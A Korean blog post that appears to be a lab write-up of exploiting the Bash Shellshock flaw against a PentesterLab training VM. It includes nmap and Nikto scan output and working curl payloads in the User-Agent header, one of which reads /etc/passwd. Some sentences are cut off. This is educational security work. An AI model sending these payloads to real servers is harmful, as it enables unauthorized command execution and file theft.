홈페이지 취약점 분석 이야기 | 파일 지도 사진 깨알 |
---|
>> 목록보이기 CVE-2014-6271 - BASH 원격명령어실행 취약점, ShellshockBash의 원격명령어실행 취약점인 쉘쇼크(Shellshock)는 배쉬구멍(Bashdoor)이라고도 부른다. 영어권에서 뒷구멍(Backdoor)에 대비되는 말로 붙인듯 하다. 시스템에 침투할 수 있는 backdoor와 동일한 역할을 할 수 있으므로 bashdoor라는 표현이 정확할 듯 하다.
이 취약점은 2014년 9월 24일에 공개되어 "
참고할 바깥고리
PentesterLab의 CVE-2014-6271/Shellshock 훈련장 설치PentesterLab의 CVE-2014-6271/Shellshock 누리집에서 훈련장 ISO 파일(19MB)를 받는다.
VirtaulBox를 실행하고 "
취약점 분석에 사용할 Kali Linux가 VMware Workstation Player의 가상머신으로 설치된 문제 때문에 CVE-2014-6271/Shellshock 가상머신을 NAT 네트워크인 vmnet8에 연결시켰다(vmnet1은 host-only이므로 네트워크 연결이 되지 않는 점에 주의). 이렇게 함으로써 VMWare의 손님OS와 VirtualBox의 손님OS 간에 네트워크를 연결시킬 수 있다. 다른 방법으로는 모든 손님 OS를 주OS의 네트워크 어댑터에 Bridge 모드로 연결시켜도 된다.
CVE-2014-6271/Shellshock 가상머신을 부팅하면 위의 그림과 같다.
Shellshock 가상머신에서
Nmap을 이용한 네트워크 포트 훑어보기Nmap 을 이용하여 Shellshock 가상머신에서 개방되어 있는 포트를 점검한다.
root@kali:~# nmap -p- -A 192.168.206.128 -oN 192.168.206.128-nmap-65535.txt Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-11-03 20:55 EDT Nmap scan report for 192.168.206.128 Host is up (0.00044s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.0 (protocol 2.0) | ssh-hostkey: | 1024 8b:4c:a0:14:1c:3c:8c:29:3a:16:1c:f8:1a:70:2a:f3 (DSA) | 2048 d9:91:5d:c3:ed:78:b5:8c:9a:22:34:69:d5:68:6d:4e (RSA) |_ 256 b2:23:9a:fa:a7:7a:cb:cd:30:85:f9:cb:b8:17:ae:05 (ECDSA) 80/tcp open http Apache httpd 2.2.21 ((Unix) DAV/2) | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Apache/2.2.21 (Unix) DAV/2 |_http-title: [PentesterLab] CVE-2014-6271 No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.25BETA1%E=4%D=11/3%OT=22%CT=1%CU=32009%PV=Y%DS=2%DC=T%G=Y%TM=58 OS:1BDC8B%P=x86_64-pc-linux-gnu)SEQ(SP=11%GCD=FA00%ISR=9C%TI=I%CI=I%II=I%SS OS:=S%TS=U)OPS(O1=M5B4%O2=M5B4%O3=M5B4%O4=M5B4%O5=M5B4%O6=M5B4)WIN(W1=FFFF% OS:W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=N%T=41%W=FFFF%O=M5B4% OS:CC=N%Q=)T1(R=Y%DF=N%T=41%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=N%T=100%W=0%S=Z OS:%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=N%T=100%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T4(R OS:=Y%DF=N%T=100%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=N%T=100%W=0%S=Z%A=S+% OS:F=AR%O=%RD=0%Q=)T6(R=Y%DF=N%T=100%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=N OS:%T=100%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=36%IPL=164%UN=0%RIPL=G% OS:RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=32%CD=S) Network Distance: 2 hops TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 0.42 ms 10.0.2.2 2 0.22 ms 192.168.206.128 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 21.59 seconds root@kali:~#
[Nmap 스캔결과에서 찾은 잠재적 취약점]
Nikto 웹취약점 탐색기 실행
80 포트의 웹서비스를 대상으로 root@kali:~# nikto -host 192.168.206.128 -port 80 -o 192.168.206.128-nikto-80.txt - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.206.128 + Target Hostname: 192.168.206.128 + Target Port: 80 + Start Time: 2016-11-03 21:00:27 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.21 (Unix) DAV/2 + Server leaks inodes via ETags, header found with file /, inode: 7778, size: 1704, mtime: Thu Sep 25 05:56:50 2014 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST + 8345 requests: 0 error(s) and 10 item(s) reported on remote host + End Time: 2016-11-03 21:00:45 (GMT-4) (18 seconds) --------------------------------------------------------------------------- + 1 host(s) tested root@kali:~#
위의 + Server: Apache/2.2.21 (Unix) DAV/2 - Apache 2.2.21이 웹서버로 사용되고 있다. + Server leaks inodes via ETags, header found with file /, inode: 7778, size: 1704, mtime: Thu Sep 25 05:56:50 2014 - 웹서비스를 2014년 9월 25일 경에 작성한 것으로 추정 + The anti-clickjacking X-Frame-Options header is not present. - 클릭재킹 방어기작 부재: X-Frame-Options 참조 + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS - X-XSS-Protection 참조 + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. - 노후화된 아파치 웹서버 버전 + Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). - 두 개의 쉘쇼크(Shellshock) 취약점 탐지! + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE + OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST - 불필요한 TRACE 메소드 허용으로 XST(Cross-site Tracing) 공격가능성 존재 [Nmap + Nikto 스캔결과에서 찾은 잠재적 취약점]
OWASP-ZAP을 이용한 웹 어플리케이션 취약점 탐색
OWASP-ZAP을 실행한 후
[Nmap + Nikto + OWASP-ZAP 스캔결과에서 찾은 잠재적 취약점]
쉘쇼크(shellshock)와 CGIGnu Bash의 Shellshock 취약점은 특수하게 조작된 환경변수를 만들었을 때 환경변수 내의 문자열이 명령어로 실행되는 특수한 취약점이다. 대표적인 CVE-2014-6271 취약점을 살펴보자. $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" vulnerable this is a test $ 또는 $ export x='() { :;}; echo vulnerable' $ bash -c "echo this is a test" vulnerable this is a test $
취약점이 있는 Bash에서 위와 같이 실행하면 CGI(Common Gateway Interface)는 웹서버와 일반 프로그램을 연계하기 위해서 만들어진 규약이다 -- 현재는 서버단 스크립트 언어(Server-side Script Language; ASP, JSP, PHP 등)가 활성화되면서 많이 사용되지는 않는다. 웹서버에서 외부 프로그램을 구동하기 위해서는 웹브라우저에서 전달되는 입력값을 전달할 방법이 필요하다. 명령줄 인수, 환경변수, 표준입력이 사용되는 데 문제가 되는 부분은 환경변수이다. CGI에 대한 요청에서 웹서버가 생성한 모든 환경변수는 CGI에 지정된 외부 프로그램으로 전달된다. 이때 Shellshock 취약점이 있는 Bash의 경우에는 특수하게 조작된 환경변수에 의해서 사용자가 입력한 명령어를 실행하게 된다. 특수하게 조작된 환경변수가 만들어지고 이후에 bash를 실행하면 bash는 환경변수 내에 지정된 명령어를 실행시킨다. Bash를 이용하여 만든 CGI 프로그램의 경우에는 웹서버가 환경변수를 생성하고 이후에 bash를 실행시키므로 선 환경변수 지정과 후 bash 실행이라는 조건을 만족한다. #!/bin/sh # disable filename globbing set -f echo "Content-type: text/plain; charset=iso-8859-1" echo echo CGI/1.0 test script report: echo echo argc is $#. argv is "$*". echo echo SERVER_SOFTWARE = $SERVER_SOFTWARE echo SERVER_NAME = $SERVER_NAME echo GATEWAY_INTERFACE = $GATEWAY_INTERFACE echo SERVER_PROTOCOL = $SERVER_PROTOCOL echo SERVER_PORT = $SERVER_PORT echo REQUEST_METHOD = $REQUEST_METHOD echo HTTP_ACCEPT = "$HTTP_ACCEPT" echo PATH_INFO = "$PATH_INFO" echo PATH_TRANSLATED = "$PATH_TRANSLATED" echo SCRIPT_NAME = "$SCRIPT_NAME" echo QUERY_STRING = "$QUERY_STRING" echo REMOTE_HOST = $REMOTE_HOST echo REMOTE_ADDR = $REMOTE_ADDR echo REMOTE_USER = $REMOTE_USER echo AUTH_TYPE = $AUTH_TYPE echo CONTENT_TYPE = $CONTENT_TYPE echo CONTENT_LENGTH = $CONTENT_LENGTH [ ↑ 한때 아파치 웹서버가 기본으로 제공했던 /cgi-bin/test-cgi 파일의 내용 ]
Apache 웹서버는 기본적으로 #!/bin/bash echo "Content-Type: application/json"; echo "" echo '{ "uptime": "'`uptime`'", "kernel": "'`uname -a`'"} ' [ ↑ /var/www/cgi-bin/status 파일의 내용 ]
이 훈련장의 이 훈련장의 쉘쇼크(shellshock) 진단
쉡쇼크 이외의 다른 취약점들은 별도의 보고서에서 다룬다.
이 절에서는 shellshock 취약점이 있는 Gnu Bash를 기반으로하는 CGI에서 발생하는 Bashdoor를 살펴본다.
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
CVE-2014-6271와
CVE-2014-6278의
두 취약점이 root@kali:~# curl -v -A "() { :;};" http://192.168.206.128/cgi-bin/status * Trying 192.168.206.128... * Connected to 192.168.206.128 (192.168.206.128) port 80 (#0) > GET /cgi-bin/status HTTP/1.1 > Host: 192.168.206.128 > User-Agent: () { :;}; > Accept: */* > < HTTP/1.1 200 OK < Date: Sat, 05 Nov 2016 02:46:53 GMT < Server: Apache/2.2.21 (Unix) DAV/2 < Content-Length: 176 < Content-Type: application/json < { "uptime": " 02:46:53 up 10:15, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"} * Connection #0 to host 192.168.206.128 left intact root@kali:~# root@kali:~# curl -v -A "() { :;}; echo" http://192.168.206.128/cgi-bin/status * Trying 192.168.206.128... * Connected to 192.168.206.128 (192.168.206.128) port 80 (#0) > GET /cgi-bin/status HTTP/1.1 > Host: 192.168.206.128 > User-Agent: () { :;}; echo > Accept: */* > < HTTP/1.1 200 OK < Date: Sat, 05 Nov 2016 02:43:07 GMT < Server: Apache/2.2.21 (Unix) DAV/2 < Transfer-Encoding: chunked < Content-Type: text/plain < Content-Type: application/json { "uptime": " 02:43:07 up 10:12, 1 users, load average: 0.00, 0.01, 0.04", "kernel": "Linux vulnerable 3.14.1-pentesterlab #1 SMP Sun Jul 6 09:16:00 EST 2014 i686 GNU/Linux"} * Connection #0 to host 192.168.206.128 left intact root@kali:~#
위의 두 예에서는 "
이러한 관찰을 바탕으로 root@kali:~# curl -v -A "() { :;}; echo;/bin/cat /etc/passwd" http://192.168.206.128/cgi-bin/status * Trying 192.168.206.128... * Connected to 192.168.206.128 (192.168.206.128) port 80 (#0) > GET /cgi-bin/status HTTP/1.1 > Host: 192.168.206.128 > User-Agent: () { :;}; echo;/bin/cat /etc/passwd > Accept: */* > < HTTP/1.1 200 OK < Date: Sat, 05 Nov 2016 03:10:23 GMT < Server: Apache/2.2.21 (Unix) DAV/2 < Transfer-Encoding: chunked < Content-Type: text/plain < root:x:0:0:root:/root:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/false tc:x:1001:50:Linux User,,,:/home/tc:/bin/sh pentesterlab:x:1000:50:Linux User,,,:/home/pentesterlab:/bin/sh * Connection #0 to host 192.168.206.128 left intact root@kali:~#
위의 예에서는 웹취약성분석은 이러한 취약점 분석 결과를 취합하여 보고서 작성 및 제출로 일단락된다. KISA의 취약점 항목과 거의 동일하게 구성한 순서대로 PentesterLab CVE-2014-6217/Shellshock 훈련장 웹취약성분석 결과보고서를 참조하기 바란다. [처음 작성한 날: 2016.11.04] [마지막으로 고친 날: 2016.11.24] < 이전 글 : 웹취약점 분석 도구로서의 cURL (2016.11.07) > 다음 글 : [PentesterLab] CVE-2014-6271 Shellshock 훈련장 웹취약점 분석 보고서 (2016.11.06) 이 저작물은 크리에이티브 커먼즈 저작자표시 4.0 국제 라이선스에 따라 이용할 수 있습니다. 잘못된 내용, 오탈자 및 기타 문의사항은 j1n5uk{at}daum.net으로 연락주시기 바랍니다. 문서의 시작으로 컴퓨터 깨알지식 웹핵 누리집 대문 |